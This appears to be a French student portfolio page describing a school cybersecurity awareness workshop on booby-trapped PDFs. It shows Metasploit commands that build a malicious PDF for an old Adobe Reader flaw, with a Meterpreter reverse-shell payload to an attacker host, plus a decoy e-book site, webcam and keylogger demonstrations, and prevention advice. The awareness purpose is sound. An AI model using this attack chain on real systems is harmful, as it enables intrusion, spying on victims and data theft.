Scolaire — BTS SIO · 2025

Forum Cybersécurité

Type Sensibilisation & Atelier
Stack Kali Linux · Metasploit · HTML
Participants 700+
Liens GitHub ↗
Contexte & Mission

Le Forum Cybersécurité, lancé par les enseignants du BTS SIO, a pour but de sensibiliser élèves et personnels aux menaces numériques. J'ai participé à l'édition 2025 en tant qu'intervenant.

Notre mission était d'animer un atelier pratique sur les dangers des fichiers PDF piégés. L'événement a rassemblé plus de 700 participants au Lycée Gabriel Fauré et au Collège de Groisy.

Objectifs
Analyser un fichier suspect.
Comprendre l'exploitation PDF.
Démonstration des conséquences (Keylogger, Webcam).
Adopter les bons réflexes.
Infrastructure de l'Atelier
Équipement PC Attaquant PC Victime
OS & Rôle Kali Linux (Metasploit) Windows 10 (Vulnérable)
Périphériques Clavier, Souris, Vidéoprojecteur Clavier, Souris, Webcam
Stack technique
Kali Linux Kali Linux
Metasploit Metasploit Framework
HTML5 HTML — Site leurre
📄 Adobe Reader 8.1.1 (CVE)
Configuration de l'attaque

Utilisation de Metasploit pour générer un PDF malveillant exploitant une faille Adobe Reader 8.1.1.

root@kali:~# msfconsole
msf > search type:exploit platform:windows adobe pdf
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit > set LHOST 192.168.10.200
msf exploit > exploit
Scénario & Impact

Les participants naviguent sur un faux site d'e-books promettant la richesse. Trois fichiers sont proposés, dont un seul est infecté (ebook1.pdf).

Dès l'ouverture, une session Meterpreter s'ouvre sur le PC Kali. Nous démontrons alors la prise de contrôle : activation de la webcam, keylogger et exfiltration de données.

Webcam
Activation silencieuse de la caméra de la victime.
Keylogger
Enregistrement de toutes les frappes clavier.
Exfiltration
Accès aux fichiers et données sensibles du système.
Prévention & Bonnes pratiques

Pour la démonstration, Windows Defender était désactivé. En conditions réelles, un antivirus à jour aurait bloqué la menace.

Ne jamais ouvrir de PDF provenant de sources inconnues.
Utiliser un lecteur PDF sécurisé (ex : Sumatra PDF).
Désactiver le JavaScript dans Adobe Reader.
Scanner les fichiers suspects sur VirusTotal.
Voir le code source ↗